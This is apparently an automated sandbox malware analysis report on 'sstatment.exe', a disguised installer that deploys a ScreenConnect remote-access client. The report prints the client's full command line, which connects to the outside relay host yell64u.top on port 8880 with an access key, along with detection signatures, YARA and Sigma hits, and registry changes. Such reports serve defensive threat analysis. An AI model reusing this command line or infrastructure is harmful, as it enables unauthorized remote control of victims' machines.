
Windows Analysis Report
sstatment.exe

Overview

General Information

Sample name: sstatment.exe
Analysis ID: 1534362
MD5: 9aba870d429cb8fa53103ae4b7182af6
SHA1: 5f5cea1da1f5238f76a547a1c1fab8b039a190b0
SHA256: 9fa76b4ab82376d9486f051b2a7f0e2f584243296f94b2b4b30ea24fae05edd3
Tags: exe, user-malwarology

Detection

ScreenConnect Tool
Score: 42
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 32
Range: 0 - 100

Signatures

.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • sstatment.exe (PID: 4320 cmdline: "C:\Users\user\Desktop\sstatment.exe" MD5: 9ABA870D429CB8FA53103AE4B7182AF6)
    • msiexec.exe (PID: 3864 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 6048 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 5012 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 59D7E5A298D3BDCE75E1864C9D19AFAE C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 3332 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI2C46.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6171828 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 732 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 538DC24C91048081BEAA643BBADB9B49 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7196 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 03E219FD9DD5FBE89B8F3FB198F75C6D E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 7236 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=0a7ccdb4-25e1-42ac-b218-f258ea3dd8fe&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=PHP&c=&c=Sales&c=&c=&c=&c=&c=" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 7308 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "fda0d9d1-006f-4842-aa6c-538f6b380dd3" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
    • ScreenConnect.WindowsClient.exe (PID: 7424 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "3ed7d239-c254-4fd8-943e-8cdfefb70c7f" "System" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
Yara Overview

Initial Sample
Source | Rule | Description | Author | Strings
sstatment.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Dropped Files
Source | Rule | Description | Author | Strings
C:\Windows\Installer\MSI3407.tmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Config.Msi\5e3177.rbs | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Memory Dumps
Source | Rule | Description | Author | Strings
00000000.00000002.1716168698.00000000054E0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000008.00000000.1751452083.0000000000B52000.00000002.00000001.01000000.00000011.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000008.00000002.2951121730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000000.00000000.1692726837.0000000000A16000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000009.00000002.1801845823.0000000003171000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
(5 further entries not shown)

Unpacked PEs
Source | Rule | Description | Author | Strings
8.2.ScreenConnect.WindowsClient.exe.2f0fa20.0.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0.2.sstatment.exe.54e0000.7.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
8.0.ScreenConnect.WindowsClient.exe.b50000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0.2.sstatment.exe.54e0000.7.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0.0.sstatment.exe.ac5db8.2.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
(4 further entries not shown)

                              System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=0a7ccdb4-25e1-42ac-b218-f258ea3dd8fe&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=PHP&c=&c=Sales&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=0a7ccdb4-25e1-42ac-b218-f258ea3dd8fe&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=PHP&c=&c=Sales&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=0a7ccdb4-25e1-42ac-b218-f258ea3dd8fe&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=PHP&c=&c=Sales&c=&c=&c=&c=&c=", ProcessId: 7236, ProcessName: ScreenConnect.ClientService.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: ScreenConnect Client (de5851ad6e374ce3) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 6048, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-406F-012C01771397}\(Default)
                              No Suricata rule has matched


                              AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 85.6% probability
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 7_2_03C016F8 CryptProtectData, 7_2_03C016F8
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 7_2_03C016F1 CryptProtectData, 7_2_03C016F1
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 7_2_058422E4 CryptUnprotectData, 7_2_058422E4
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 7_2_05842FF0 CryptUnprotectData, 7_2_05842FF0
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 7_2_058422B0 CryptUnprotectData, 7_2_058422B0
Source: C:\Users\user\Desktop\sstatment.exe | EXE: msiexec.exe

                              Compliance

Source: C:\Users\user\Desktop\sstatment.exe | EXE: msiexec.exe
Source: sstatment.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: sstatment.exe | Static PE information: certificate valid
Source: sstatment.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800250212.0000000001722000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1751452083.0000000000B52000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: sstatment.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: sstatment.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: sstatment.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.2964986924.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1808670263.0000000013180000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: sstatment.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.2951121730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800702450.0000000001760000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800903577.00000000017C2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1801845823.0000000003171000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: sstatment.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1731372444.000000000055D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: sstatment.exe, ScreenConnect.Windows.dll.2.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1715220594.0000000004770000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1709027624.0000000004875000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: sstatment.exe, 5e3178.msi.2.dr, MSI3407.tmp.2.dr, 5e3177.rbs.2.dr, 5e3176.msi.2.dr, MSI367A.tmp.2.dr, setup.msi.0.dr, MSI3417.tmp.2.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.2964986924.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1808670263.0000000013180000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1751452083.0000000000B52000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: sstatment.exe, 5e3178.msi.2.dr, 5e3176.msi.2.dr, MSI2C46.tmp.1.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: sstatment.exe, ScreenConnect.Windows.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800250212.0000000001722000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.2964986924.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1808670263.0000000013180000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: sstatment.exe
Source: C:\Windows\System32\msiexec.exe | File opened: z:
Source: C:\Windows\System32\msiexec.exe | File opened: x:
Source: C:\Windows\System32\msiexec.exe | File opened: v:
Source: C:\Windows\System32\msiexec.exe | File opened: t:
Source: C:\Windows\System32\msiexec.exe | File opened: r:
Source: C:\Windows\System32\msiexec.exe | File opened: p:
Source: C:\Windows\System32\msiexec.exe | File opened: n:
Source: C:\Windows\System32\msiexec.exe | File opened: l:
Source: C:\Windows\System32\msiexec.exe | File opened: j:
Source: C:\Windows\System32\msiexec.exe | File opened: h:
Source: C:\Windows\System32\msiexec.exe | File opened: f:
Source: C:\Windows\System32\msiexec.exe | File opened: b:
Source: C:\Windows\System32\msiexec.exe | File opened: y:
Source: C:\Windows\System32\msiexec.exe | File opened: w:
Source: C:\Windows\System32\msiexec.exe | File opened: u:
Source: C:\Windows\System32\msiexec.exe | File opened: s:
Source: C:\Windows\System32\msiexec.exe | File opened: q:
Source: C:\Windows\System32\msiexec.exe | File opened: o:
Source: C:\Windows\System32\msiexec.exe | File opened: m:
Source: C:\Windows\System32\msiexec.exe | File opened: k:
Source: C:\Windows\System32\msiexec.exe | File opened: i:
Source: C:\Windows\System32\msiexec.exe | File opened: g:
Source: C:\Windows\System32\msiexec.exe | File opened: e:
Source: C:\Windows\System32\msiexec.exe | File opened: c:
Source: C:\Windows\System32\msiexec.exe | File opened: a:

                              Networking

Source: C:\Windows\System32\msiexec.exe | Registry value created: NULL Service
Source: global traffic | TCP traffic: 192.168.2.4:49731 -> 85.239.34.190:8880
Source: Joe Sandbox View | ASN Name: RAINBOW-HKRainbownetworklimitedHK
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: yell64u.top
Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1808670263.0000000013180000.00000004.00000800.00020000.00000000.sdmp, sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.WindowsClient.exe.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1808670263.0000000013180000.00000004.00000800.00020000.00000000.sdmp, sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr | String found in binary or memory: http://ocsp.digicert.com0
Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr | String found in binary or memory: http://ocsp.digicert.com0A
Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr | String found in binary or memory: http://ocsp.digicert.com0X
Source: ScreenConnect.ClientService.exe, 00000007.00000002.2953487758.00000000016CA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1801845823.0000000003171000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rundll32.exe, 00000004.00000003.1709211710.0000000004773000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.0000000004875000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr | String found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
Source: rundll32.exe, 00000004.00000003.1709211710.0000000004773000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.0000000004875000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr | String found in binary or memory: http://wixtoolset.org/news/
Source: rundll32.exe, 00000004.00000003.1709211710.0000000004773000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.0000000004875000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr | String found in binary or memory: http://wixtoolset.org/releases/
Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1808670263.0000000013180000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: ScreenConnect.Core.dll.2.dr | String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

                              Spam, unwanted Advertisements and Ransom Demands

Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
